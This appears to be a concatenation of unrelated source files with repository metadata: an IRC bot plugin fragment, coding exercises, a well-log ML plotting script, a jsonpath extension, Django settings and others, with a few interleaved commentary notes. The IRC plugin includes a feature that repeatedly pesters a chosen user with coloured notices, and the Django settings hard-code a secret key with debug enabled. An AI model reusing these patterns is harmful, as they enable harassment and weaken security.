irc.reply('<{0}> {1}'.format(each[0],output),prefixNick=False)
return 0
irc.error('Not found in buffer')
userCorrect = urlSnarfer(userCorrect)
def saveLast(self,irc,msg,match):
r".+"
channel = msg.args[0]
try: self.buffer[channel]
except: self.buffer[channel]=[]
# Stuff for multikick
for each in self.kickuser:
if each in msg.nick.lower() and not self.kickuser[each]['num'] <= 0:
irc.queueMsg(ircmsgs.ban(msg.args[0], msg.nick))
irc.queueMsg(ircmsgs.kick(msg.args[0], msg.nick, "{}".format(self.kickuser[each]['msg'].replace('#n',str(self.kickuser[each]['num'])))))
self.kickuser[each]['num']-=1
def un():
irc.queueMsg(ircmsgs.unban(msg.args[0],msg.nick))
schedule.addEvent(un,time.time()+random.randint(30,120))
# END
line = match.group(0).replace('\x01ACTION','*').strip('\x01')
if msg.nick.lower() in self.annoyUser:
def fu():
irc.queueMsg(ircmsgs.IrcMsg('NOTICE {} :\x02\x03{},{}{}'.format(msg.nick,random.randint(0,15),random.randint(0,15),line)))
schedule.addEvent(fu,time.time()+random.randint(2,60))
self.buffer[channel].insert(0,[msg.nick,line])
if len(self.buffer[channel]) > self.buffsize: self.buffer[channel].pop(self.buffsize)
return 1
saveLast = urlSnarfer(saveLast)
#####################
### Utilities ###
#####################
def _sendMsg(self, irc, msg):
irc.queueMsg(msg)
irc.noReply()
Class = General
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
| [
"antb@home"
] | antb@home |
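The `banmask` command reduces a hostmask to an IP-shaped wildcard by swapping each digit separator for `?`. The core transformation, lifted out of the plugin so it can be run standalone (the hostmask is invented):

```python
import re

ipre = re.compile(r"[0-9]{1,3}[.-][0-9]{1,3}[.-][0-9]{1,3}[.-][0-9]")
hostmask = "nick!user@gateway/web/1.2.3.4"   # made-up example
match = ipre.search(hostmask)
bm = match.group(0).replace(".", "?").replace("-", "?")
print("*!*@*" + bm + "*")                    # -> *!*@*1?2?3?4*
```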
a83270f6d427c435029af0bb9b9d25f6cecb3ade | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/containsDuplicate_20200907094218.py | 458d5b60e59b1430badf47c2855449f00123736e | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | def duplicate(nums,k,t):
    # Return True if two values at most k indices apart differ by at most t.
    for i in range(len(nums)):
        for j in range(i + 1, min(i + k + 1, len(nums))):
            if abs(nums[i] - nums[j]) <= t:
                return True
    return False

print(duplicate([1, 2, 3, 1], 3, 0))  # True: nums[0] == nums[3] and |0 - 3| <= 3
| [
"[email protected]"
] | |
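The scan above is O(n*k). For the same "contains nearby almost-duplicate" problem, a common O(n) alternative buckets values into ranges of width t+1, so that candidates within t of each other always fall in the same or an adjacent bucket. This is a sketch, not part of the original file:

```python
def contains_nearby_almost_duplicate(nums, k, t):
    # Bucket values by width t+1; keep only the last k elements' buckets.
    if k < 0 or t < 0:
        return False
    buckets = {}
    width = t + 1
    for i, x in enumerate(nums):
        b = x // width
        if b in buckets:
            return True
        if b - 1 in buckets and x - buckets[b - 1] <= t:
            return True
        if b + 1 in buckets and buckets[b + 1] - x <= t:
            return True
        buckets[b] = x
        if i >= k:                           # slide the window
            del buckets[nums[i - k] // width]
    return False

print(contains_nearby_almost_duplicate([1, 2, 3, 1], 3, 0))  # True
```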
04dad20bfc067a777d7795de17a2478da378fbba | 1b862f34c125ce200244dd79e4fda4b5b605ce2e | /.history/ML_T2_Validation_20210612125732.py | a3e3c1f66f5dc1ddb190e134a71155157cd4acab | [] | no_license | edwino26/CoreImages | 26085a49cf1cb79442ae563a88354b2fdceace87 | 6bf6e68cac8ab36c87b1e6ea702bfe6882b0f40e | refs/heads/master | 2023-06-22T12:53:37.344895 | 2021-07-21T04:31:44 | 2021-07-21T04:31:44 | 309,553,247 | 0 | 4 | null | 2021-04-29T23:23:15 | 2020-11-03T02:45:07 | Lasso | UTF-8 | Python | false | false | 9,251 | py | #T2 TEST DATA
# %%
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import pickle
from scipy import interpolate
from scipy.integrate import simps
from numpy import trapz
# %%
#Load Stack
UVStack = pd.read_excel('./ML_Results/T2_test/ImgStack.xls')
ImgStackk = UVStack.copy().to_numpy()
# %%
def integrate(y_vals, h):
i = 1
total = y_vals[0] + y_vals[-1]
for y in y_vals[1:-1]:
if i % 2 == 0:
total += 2 * y
else:
total += 4 * y
i += 1
return total * (h / 3.0)
# %% Load and resample "results" (res) file
sub = pd.read_excel('./ML_Results/T2_test/sub.xls')
res = pd.read_excel('./ML_Results/T2_test/Results.xls')
res = res[res.Well == 'T2']
res.sort_values(by=['DEPT'])
res.drop(['Unnamed: 0', 'Set'], axis=1, inplace=True)
res.reset_index(inplace=True, drop=True)
dep = np.arange(min(res.DEPT), max(res.DEPT),0.5) #res is not at 0.5 thanks to balancing
res_rs = pd.DataFrame(columns=[res.columns])
res_rs.DEPT = dep
for i in range(len(res.columns)):
if i != 8:
f = interpolate.interp1d(res.DEPT, res.iloc[:,i])
res_rs.iloc[:,i] =f(dep)
else:
res_rs.iloc[:,i] = res.Well[0]
#T2_rs.dropna(inplace=True)
res = res_rs.copy()
difference = res.DEPT.diff()
difference.describe()
# %%
TT = pd.read_excel('./ML_Results/Train_Test_Results.xls')
istr = 0
iend = 42344
dplot_o = 3671
dplot_n = 3750
shading = 'bone'
# %% Load Log Calculations
T2_x = pd.read_excel('./Excel_Files/T2.xls',sheet_name='T2_data')
T2_x = T2_x[['DEPTH','GR_EDTC','RHOZ','AT90','NPHI','Vsh','Vclay','grain_density','porosity',
'RW2','Sw_a','Sw_a1','Sw_p','Sw_p1','SwWS','Swsim','Swsim1','PAY_archie',
'PAY_poupon','PAY_waxman','PAY_simandoux']]
# %%
T2_rs = pd.DataFrame(columns=[T2_x.columns])
T2_rs.iloc[:,0] = dep
for i in range(len(T2_x.columns)):
f = interpolate.interp1d(T2_x.DEPTH, T2_x.iloc[:,i])
T2_rs.iloc[:,i] =f(dep)
#T2_rs.dropna(inplace=True)
T2_x = T2_rs.copy()
difference_T2 = T2_x.DEPTH.diff()
difference.describe()
# %%
plt.figure()
plt.subplot2grid((1, 10), (0, 0), colspan=3)
plt.plot(sub['GRAY'], sub['DEPTH'], 'mediumseagreen', linewidth=0.5);
plt.axis([50, 250, dplot_o, dplot_n]);
plt.gca().invert_yaxis();
plt.fill_between(sub['GRAY'], 0, sub['DEPTH'], facecolor='green', alpha=0.5)
plt.xlabel('Gray Scale RGB')
plt.subplot2grid((1, 10), (0, 3), colspan=7)
plt.imshow(ImgStackk[istr:iend,80:120], aspect='auto', origin='upper', extent=[0,1,dplot_n,dplot_o], cmap=shading);
plt.axis([0, 1, dplot_o, dplot_n]);
plt.gca().invert_yaxis()
plt.xlabel('Processed Image')
plt.colorbar()
p_50 = np.percentile(sub['DEPTH'], 50)
plt.yticks([]); plt.xticks([])
plt.subplots_adjust(wspace = 20, left = 0.1, right = 0.9, bottom = 0.1, top = 0.9)
plt.show()
# %%
CORE =pd.read_excel('./CORE/CORE.xlsx',sheet_name='XRD')
mask = CORE.Well.isin(['T2'])
T2_Core = CORE[mask]
prof=T2_Core['Depth']
clays=T2_Core['Clays']
xls1 = pd.read_excel ('./CORE/CORE.xlsx', sheet_name='Saturation')
mask = xls1.Well.isin(['T2'])
T2_sat = xls1[mask]
long=T2_sat ['Depth']
poro=T2_sat ['PHIT']
grain=T2_sat ['RHOG']
sw_core=T2_sat ['Sw']
klinkenberg = T2_sat ['K']
minimo=grain.min()
maximo=grain.max()
c=2.65
d=2.75
norm=(((grain-minimo)*(d-c)/(maximo-minimo))+c)
xls2 = pd.read_excel ('./CORE/CORE.xlsx', sheet_name='Gamma')
mask = xls2.Well.isin(['T2'])
T2_GR = xls2[mask]
h=T2_GR['Depth']
cg1=T2_GR['GR_Scaled']
# %%
# ~~~~~~~~~~~~~~~~~~ Plot Results ~~~~~~~~~~~~~~~~~~~~~~
ct = 0
top= dplot_o
bottom= dplot_n
no_plots = 9
ct+=1
plt.figure(figsize=(10,9))
plt.subplot(1,no_plots,ct)
plt.plot (T2_x.GR_EDTC,T2_x.DEPTH,'g', lw=3)
#plt.fill_between(T2_x.GR_EDTC.values.reshape(-1), T2_x.DEPTH.values.reshape(-1), y2=0,color='g', alpha=0.8)
plt.title('$GR/ Core.GR $',fontsize=8)
plt.axis([40,130,top,bottom])
plt.xticks(fontsize=8)
plt.yticks(fontsize=8)
plt.xlabel('Gamma Ray ',fontsize=6)
plt.gca().invert_yaxis()
plt.grid(True)
plt.hlines(y=3665.65, xmin=0, xmax=130)
plt.hlines(y=3889.5, xmin=0, xmax=130)
ct+=1
plt.subplot(1,no_plots,ct)
plt.plot (T2_x.PAY_poupon,T2_x.DEPTH,'r',lw=0.5)
h_P = integrate(T2_x.PAY_poupon.values, 0.5)
plt.title('$PAY_P$',fontsize=8)
plt.fill_between(T2_x.PAY_poupon.values.reshape(-1),T2_x.DEPTH.values.reshape(-1), color='r', alpha=0.8)
plt.axis([0.01,0.0101,top,bottom])
plt.xticks(fontsize=8)
plt.gca().invert_yaxis()
plt.gca().xaxis.set_visible(False)
plt.gca().yaxis.set_visible(False)
plt.grid(True)
plt.hlines(y=3665.65, xmin=0, xmax=130)
plt.hlines(y=3889.5, xmin=0, xmax=130)
#Waxman-Smits
ct+=1
plt.subplot(1,no_plots,ct)
plt.plot (T2_x.PAY_waxman,T2_x.DEPTH,'g',lw=0.5)
h_WS = integrate(T2_x.PAY_waxman.values, 0.5)
plt.title('$PAY_W$',fontsize=8)
plt.fill_between(T2_x.PAY_waxman.values.reshape(-1),T2_x.DEPTH.values.reshape(-1), color='g', alpha=0.8)
plt.axis([0.01,0.0101,top,bottom])
plt.xticks(fontsize=8)
plt.gca().invert_yaxis()
plt.gca().xaxis.set_visible(False)
plt.gca().yaxis.set_visible(False)
plt.grid(True)
plt.hlines(y=3665.65, xmin=0, xmax=130)
plt.hlines(y=3889.5, xmin=0, xmax=130)
#Simandoux
ct+=1
plt.subplot(1,no_plots,ct)
plt.plot (T2_x.PAY_simandoux,T2_x.DEPTH,'y',lw=0.5)
h_S = integrate(T2_x.PAY_simandoux.values, 0.5)
plt.title('$PAY_S$',fontsize=8)
plt.fill_between(T2_x.PAY_simandoux.values.reshape(-1),T2_x.DEPTH.values.reshape(-1), color='y', alpha=0.8)
plt.axis([0.01,0.0101,top,bottom])
plt.xticks(fontsize=8)
plt.gca().invert_yaxis()
plt.gca().xaxis.set_visible(False)
plt.gca().yaxis.set_visible(False)
plt.grid(True)
plt.hlines(y=3665.65, xmin=0, xmax=130)
plt.hlines(y=3889.5, xmin=0, xmax=130)
ct+=1 #RGB Gray from Image
plt.subplot(1,no_plots,ct)
plt.plot(sub['GRAY'], sub['DEPTH'], 'mediumseagreen', linewidth=0.5);
plt.axis([50, 250, dplot_o, dplot_n]);
plt.xticks(fontsize=8)
plt.title('$Core Img$',fontsize=8)
plt.gca().invert_yaxis();
plt.gca().yaxis.set_visible(False)
plt.fill_between(sub['GRAY'], 0, sub['DEPTH'], facecolor='green', alpha=0.5)
plt.xlabel('Gray Scale RGB', fontsize=7)
ct+=1 # True UV from Image
plt.subplot(1,no_plots,ct, facecolor='#302f43')
corte= 170
PAY_Gray_scale = res['GRAY'].copy()
PAY_Gray_scale.GRAY[PAY_Gray_scale.GRAY<corte] = 0
PAY_Gray_scale.GRAY[PAY_Gray_scale.GRAY>=corte] = 1
h_TRUE_UV = integrate(PAY_Gray_scale.values, 0.5)
plt.plot (PAY_Gray_scale,res.DEPT,'#7d8d9c',lw=0.5)
plt.title('$OBJETIVO$',fontsize=8)
plt.fill_between(PAY_Gray_scale.values.reshape(-1),res.DEPT.values.reshape(-1), color='#7d8d9c', alpha=0.8)
plt.axis([0.01,0.0101,top,bottom])
plt.xticks(fontsize=8)
plt.gca().invert_yaxis()
plt.gca().xaxis.set_visible(False)
plt.gca().yaxis.set_visible(False)
plt.grid(True)
plt.xlabel('Resolution to Log Scale',fontsize=7)
ct+=1
plt.subplot(1,no_plots,ct)
plt.imshow(ImgStackk[istr:iend,80:120], aspect='auto', origin='upper', extent=[0,1,dplot_n,dplot_o], cmap=shading);
plt.axis([0, 1, dplot_o, dplot_n]);
plt.xticks(fontsize=8)
plt.gca().invert_yaxis()
plt.xlabel('Stacked UV Photos', fontsize=7)
plt.colorbar()
p_50 = np.percentile(sub['DEPTH'], 50)
plt.yticks([]); plt.xticks([])
ct+=1
plt.subplot(1,no_plots,ct)
plt.plot (res['RandomForest'],res.DEPT,'r',lw=1)
plt.plot (res.GRAY,res.DEPT,'k',lw=0.5)
plt.title('Machine Learning',fontsize=8)
plt.axis([0,2,top,bottom])
plt.xticks(fontsize=8)
plt.xlabel('RandomForest',fontsize=7)
plt.gca().invert_yaxis()
plt.gca().invert_xaxis()
plt.gca().yaxis.set_visible(False)
plt.grid(True)
plt.xlim(0, 255)
plt.hlines(y=3665.65, xmin=0, xmax=130)
plt.hlines(y=3889.5, xmin=0, xmax=130)
ct+=1
plt.subplot(1,no_plots,ct, facecolor='#302f43')
PAY_Gray_scale2 = res['RandomForest'].copy().rename(columns={'RandomForest':'GRAY'})
PAY_Gray_scale2.GRAY[PAY_Gray_scale2.GRAY<corte] = 0
PAY_Gray_scale2.GRAY[PAY_Gray_scale2.GRAY>=corte] = 1
h_ML = integrate(PAY_Gray_scale2.values, 0.5)
plt.plot (PAY_Gray_scale2, res.DEPT,'#7d8d9c',lw=0.5)
plt.title('$RESULTADO: TEST Set$',fontsize=8)
plt.fill_between(PAY_Gray_scale2.values.reshape(-1),res.DEPT.values.reshape(-1), color='#7d8d9c', alpha=0.8)
plt.axis([0.01,0.0101,top,bottom])
plt.xticks(fontsize=8)
plt.gca().invert_yaxis()
plt.gca().xaxis.set_visible(False)
plt.gca().yaxis.set_visible(False)
plt.grid(True)
plt.suptitle('Pozo T2: Comparación Final')
plt.show()
# %%
# %%
plt.figure(figsize=(10,9))
plt.subplot(1,1,1)
plt.plot(res.GRAY, res['RandomForest'], 'ko')
plt.plot(res.GRAY, res.GRAY, 'r')
plt.xlim(0, 255)
plt.ylim(0, 255)
plt.xlabel('Valor en Escala de Gris Suavizado a res. de Registros',fontsize=17)
plt.ylabel('Predicción de Escala de Gris usando Random Forest',fontsize=17)
plt.show()
# %% Error Calculation
# T2_x.PAY_poupon,T2_x.DEPTH
# T2_x.PAY_waxman
# T2_x.PAY_simandoux
def integrate(y_vals, h):
i = 1
total = y_vals[0] + y_vals[-1]
for y in y_vals[1:-1]:
if i % 2 == 0:
total += 2 * y
else:
total += 4 * y
i += 1
return total * (h / 3.0)
# %%
pay = pd.DataFrame(columns=['Poupon', 'Waxman_Smits', 'Simandoux', 'Machine_L', 'True_UV'])
pay.Poupon = h_P
pay.Waxman_Smits = h_WS
pay.Simandoux = h_S
pay.Machine_L = h_ML
pay.True_UV = h_TRUE_UV
pay.head()
#rmse['Poupon'] = mean_squared_error(y_test, y_pred_test, squared=False)
# %%
| [
"[email protected]"
] | |
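The `integrate` helper (defined twice in this script) is composite Simpson's rule with step `h`, which assumes an odd number of samples. A quick sanity check against the exact integral of x^2 over [0, 2], which is 8/3:

```python
y_vals = [x ** 2 for x in (0.0, 0.5, 1.0, 1.5, 2.0)]  # 5 samples, h = 0.5
print(integrate(y_vals, 0.5))                         # -> 2.666..., i.e. 8/3
```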
b1a7fc689b623866f4aec9ced8da6ca250e1cc48 | e5cd01fd620e8e746a20b883de7ac32bec4feb5c | /Ejercicios python/PE7/PE7E4.py | 1b13263e7dde6dfb7f5fa46c512b4da81767aed9 | [] | no_license | eazapata/python | 0f6a422032d8fb70d26f1055dc97eed83fcdc572 | 559aa4151093a120527c459a406abd8f2ff6a7d8 | refs/heads/master | 2020-08-27T09:19:29.395109 | 2019-11-23T20:11:14 | 2019-11-23T20:11:14 | 217,314,818 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | #Escribe un programa que pida una frase, y le pase como
#(translated from Spanish) Write a program that asks the user for a phrase
#and passes that phrase to a function as a parameter. The function must
#replace every blank space in the phrase with an asterisk and return the
#result so that the main program can print it to the screen.
def quitaespacio(x):
x=x.replace(" ","*");
return (x)
frase=str(input("Escribe una frase: "))
sinespacios=quitaespacio(frase)
print(sinespacios)
| [
"[email protected]"
] | |
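A one-line check of the helper, illustrative only since the script itself reads the phrase from stdin:

```python
print(quitaespacio("hola que tal"))  # -> hola*que*tal
```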
1f35b67c23f1552af6886e53be9c92cde29f3333 | fcb5267ea83fe2f15922b5f405e534d5c37bd560 | /day21/day21a_ext.py | 249175f48203607f0023520fd97cc3348b92a4b2 | [
"MIT"
] | permissive | kannix68/advent_of_code_2019 | b3d02b695a167028bd09e72a224d89680844aade | b02a86e1f8e83111973cc2bc8c7f4d5dcf1c10aa | refs/heads/master | 2020-09-30T16:33:47.871407 | 2020-01-10T21:00:50 | 2020-01-10T21:00:50 | 227,325,884 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,281 | py | # external solution by mcpower
# see: https://github.com/mcpower/adventofcode
# name input as input.txt
import sys; sys.dont_write_bytecode = True; from utils import *
"""
Strings, lists, dicts:
lmap, ints, positive_ints, floats, positive_floats, words
Data structures:
Linked, UnionFind
dict: d.keys(), d.values(), d.items()
deque: q[0], q.append and q.popleft
List/Vector operations:
GRID_DELTA, OCT_DELTA
lget, lset, fst, snd
padd, pneg, psub, pmul, pdot, pdist1, pdist2sq, pdist2
Matrices:
matmat, matvec, matexp
"""
from intcodev1 import *
def do_case(inp: str, sample=False):
# READ THE PROBLEM FROM TOP TO BOTTOM OK
def sprint(*a, **k): sample and print(*a, **k)
lines = inp.splitlines()
prog = Intcode(ints(inp))
# prog.run_interactive()
MY_PROG = """
NOT A T
OR T J
NOT B T
OR T J
NOT C T
OR T J
NOT D T
NOT T T
AND T J
WALK
""".strip() + "\n"
inputs = list(map(ord, MY_PROG))
halted, output = prog.run_multiple(inputs)
Intcode.print_output(output)
return # RETURNED VALUE DOESN'T DO ANYTHING, PRINT THINGS INSTEAD
run_samples_and_actual([
# Part 1
r"""
""",r"""
""",r"""
""",r"""
""",r"""
""",r"""
""",r"""
"""],[
# Part 2
r"""
""",r"""
""",r"""
""",r"""
""",r"""
""",r"""
""",r"""
"""], do_case)
| [
"[email protected]"
] | |
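`MY_PROG` computes J = (NOT A OR NOT B OR NOT C) AND D: jump when any of the next three tiles is a hole and the landing tile four ahead (D) is ground. The same condition rendered as a hypothetical Python helper so the logic can be truth-table checked:

```python
def should_jump(a, b, c, d):
    # a..d: True means ground at distance 1..4; a jump lands on tile d.
    return (not a or not b or not c) and d

print(should_jump(True, True, True, True))    # False: no hole ahead, keep walking
print(should_jump(True, False, True, True))   # True: hole at B, landing tile is ground
print(should_jump(False, True, True, False))  # False: jumping would land in the hole at D
```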
2a91321f84c7bf043df76df27261026d41dd5a72 | b0475ce87641476199f8c46aa3adb9e56e1061fc | /jsonpath_ng/ext/string.py | d463967aaa487e42e9bbc3c56cdd08bc75ab4329 | [
"Apache-2.0"
] | permissive | antonstakhouski/jsonpath-ng | 0acca321022de418fd779923ac8b830b77b0046f | 8cacb50796e250a4f9fab0ca0ccf3b20cf082fd8 | refs/heads/master | 2022-01-06T22:39:35.044002 | 2019-06-27T14:12:57 | 2019-06-27T14:12:57 | 274,714,446 | 1 | 0 | Apache-2.0 | 2020-06-24T16:17:52 | 2020-06-24T16:17:52 | null | UTF-8 | Python | false | false | 2,598 | py | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import re
from .. import DatumInContext, This
SUB = re.compile("sub\(/(.*)/,\s+(.*)\)")
SPLIT = re.compile("split\((.),\s+(\d+),\s+(\d+|-1)\)")
class DefintionInvalid(Exception):
pass
class Sub(This):
"""Regex subtituor
Concrete syntax is '`sub(/regex/, repl)`'
"""
def __init__(self, method=None):
m = SUB.match(method)
if m is None:
raise DefintionInvalid("%s is not valid" % method)
self.expr = m.group(1).strip()
self.repl = m.group(2).strip()
self.regex = re.compile(self.expr)
self.method = method
print("%r" % self)
def find(self, datum):
datum = DatumInContext.wrap(datum)
value = self.regex.sub(self.repl, datum.value)
if value == datum.value:
return []
else:
return [DatumInContext.wrap(value)]
def __eq__(self, other):
return (isinstance(other, Sub) and self.method == other.method)
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self.method)
def __str__(self):
return '`sub(/%s/, %s)`' % (self.expr, self.repl)
class Split(This):
"""String splitter
Concrete syntax is '`split(char, segment, max_split)`'
"""
def __init__(self, method=None):
m = SPLIT.match(method)
if m is None:
raise DefintionInvalid("%s is not valid" % method)
self.char = m.group(1)
self.segment = int(m.group(2))
self.max_split = int(m.group(3))
self.method = method
def find(self, datum):
datum = DatumInContext.wrap(datum)
try:
value = datum.value.split(self.char, self.max_split)[self.segment]
except Exception:
return []
return [DatumInContext.wrap(value)]
def __eq__(self, other):
return (isinstance(other, Sub) and self.method == other.method)
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self.method)
def __str__(self):
return '`%s`' % self.method
| [
"[email protected]"
] | |
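Both operators can be exercised directly on a string datum; in normal use they are reached through `jsonpath_ng`'s extended parser via the backtick syntax quoted in the docstrings. A small sketch using only the classes defined above:

```python
sub = Sub("sub(/world/, there)")
print([m.value for m in sub.find("hello world")])   # -> ['hello there']

split = Split("split(-, 1, -1)")
print([m.value for m in split.find("2024-06-27")])  # -> ['06']
```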
de3c13459fa4c91f66c0dd232ec9b25575a4fe77 | 857b8979e587a5993a3362ae267a90b218413518 | /Warmup/timeconversion.py | 968831656e7611361c7a358102cb89edc4eebf59 | [] | no_license | GRinaldi97/PCSIIH2 | 08074ec0f696110f4ea0c8dce10d2f7d91a9b25f | dc8791aa226441ea6587335e2e6fcd9a0473bb27 | refs/heads/master | 2021-05-06T20:30:03.877828 | 2017-11-28T09:52:20 | 2017-11-28T09:52:20 | 112,308,371 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 420 | py | #!/bin/python3
import sys
def timeConversion(s):
L=s.split(":")
if L[-1][-2:] =='AM':
if L[0]=="12":
L[0]="00"
L[-1]= L[-1][:2]
else:
if (int(L[0]))==12:
L[-1]= L[-1][:2]
else:
L[0] = str(int(L[0])+ 12)
L[-1]= L[-1][:2]
return ":".join(L)
s = input().strip()
result = timeConversion(s)
print(result)
| [
"[email protected]"
] | |
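A few spot checks of the 12-hour to 24-hour logic; these calls are illustrative only, since the submitted solution reads its input from stdin:

```python
assert timeConversion("07:05:45PM") == "19:05:45"   # ordinary PM hour: add 12
assert timeConversion("12:00:00AM") == "00:00:00"   # midnight maps to 00
assert timeConversion("12:45:54PM") == "12:45:54"   # noon stays 12
```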
def169ee9056eaa842fac83a407d9e4fe98eadd5 | 3319aeddfb292f8ab2602840bf0c1e0c2e5927be | /python/fp/lists.py | ccb0c857fc2aa5458d4ad2cadced3d896d8aca44 | [] | no_license | slaash/scripts | 4cc3eeab37f55d822b59210b8957295596256936 | 482fb710c9e9bcac050384fb5f651baf3c717dac | refs/heads/master | 2023-07-09T12:04:44.696222 | 2023-07-08T12:23:54 | 2023-07-08T12:23:54 | 983,247 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 79 | py | #!/usr/bin/python
l=range(0,100)
i=iter(l)
for i in iter(l):
print(i)
| [
"[email protected]"
] | |
ae860b7bf43311fe416a63cf0c493b2ed218d7f5 | 2de130eadae04a40884c2692a13d7999621dfd9f | /Python/Tarea/Guia2/3_fecha_como_cadena.py | 7fcc5526521b8893744116df0fcd6b3b5b9db0a7 | [
"MIT"
] | permissive | marce1994/Learning | e11e33496f6a536e9d64cb015fa90ff4dd9ce2cf | 2b5928cf16c0d25bfc130ad4df9d415475395ec3 | refs/heads/main | 2023-06-17T11:35:14.308755 | 2021-07-22T15:34:07 | 2021-07-22T15:34:07 | 373,610,558 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | cadena_ingresada = input("Ingrese la fecha actual en formato dd/mm/yyyy: ");
separado = cadena_ingresada.split('/');
print(separado);
print(
f'Dia: {separado[0]}', '-',
f'Mes: {separado[1]}', '-',
f'Anio: {separado[2]}'
);
c = cadena_ingresada;
print(
f'Dia: {c[0]}{c[1]}', '-',
f'Mes: {c[3]}{c[4]}', '-',
f'Anio: {c[6]}{c[7]}{c[8]}{c[9]}'
);
| [
"[email protected]"
] | |
dc9873589ffbfb60b12635001740f6860f245eb0 | c6442366f1791a3e384a7298b41a70bcda6d0107 | /fahtocel.py | 828f4ed97c583c72bdc3b7cbe7da4a979bb72406 | [] | no_license | srikrishna777/python | eb8970ad9b22e5f836627bb36e152d0a26dc4526 | 78f56724d722676ef3fe2ee0ebe3bebbfd9ecb56 | refs/heads/master | 2023-06-14T08:20:38.214513 | 2021-07-14T15:50:24 | 2021-07-14T15:50:24 | 292,761,941 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | Fahrenheit =int(input("Enter Fahrenheit: "))
Celsius = (Fahrenheit - 32) * 5/9
print("the value of Celsius is" ,Celsius)
| [
"[email protected]"
] | |
bbddaea0e02684bcad5e5059bded52512c484070 | a23ee3eb7218985cc9297faef698d3d5651565d2 | /recipe_fork/recipe_fork/settings.py | 69e0407485934862c82e25dbb3852f569dd48437 | [] | no_license | suxxxoi/recipe_fork | ea402eec5657af0978d90c1fcc308f34358f8741 | 04d80c1402a0f6acbfc989076f6474245eac1b25 | refs/heads/master | 2023-01-23T03:22:51.913739 | 2020-12-02T10:56:48 | 2020-12-02T10:56:48 | 284,443,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,406 | py | """
Django settings for recipe_fork project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '0(3nuwepfk_x!@-vi)(x&e47y(bbtzfk!2h2)obw#7hguyl*o)'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'user.apps.UserConfig',
'user_index.apps.UserIndexConfig',
'recipe.apps.RecipeConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'recipe_fork.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'recipe_fork.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
# Redirect to home URL after login (Default redirects to /accounts/profile/)
LOGIN_REDIRECT_URL = '/'
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
| [
"[email protected]"
] | |
d2f43ec0f5c50ef641f8a57903e8005945738a71 | 3a462a714408cc0f5c01d1336f301ed1ba30a53e | /strategy.py | 4c87c6c45667a9b85a393a60285cbaae030c675b | [] | no_license | opz/gdax_order_book_trader | ee23e7e0be880042ec6cf83571b322351cf5ba50 | fe9253a18d011dab110950774002f242d7cf2b1f | refs/heads/master | 2018-10-14T03:04:44.239295 | 2017-12-01T16:56:29 | 2017-12-01T16:56:29 | 112,248,110 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,078 | py | from decimal import Decimal, InvalidOperation
import logging
logger = logging.getLogger(__name__)
class Strategy:
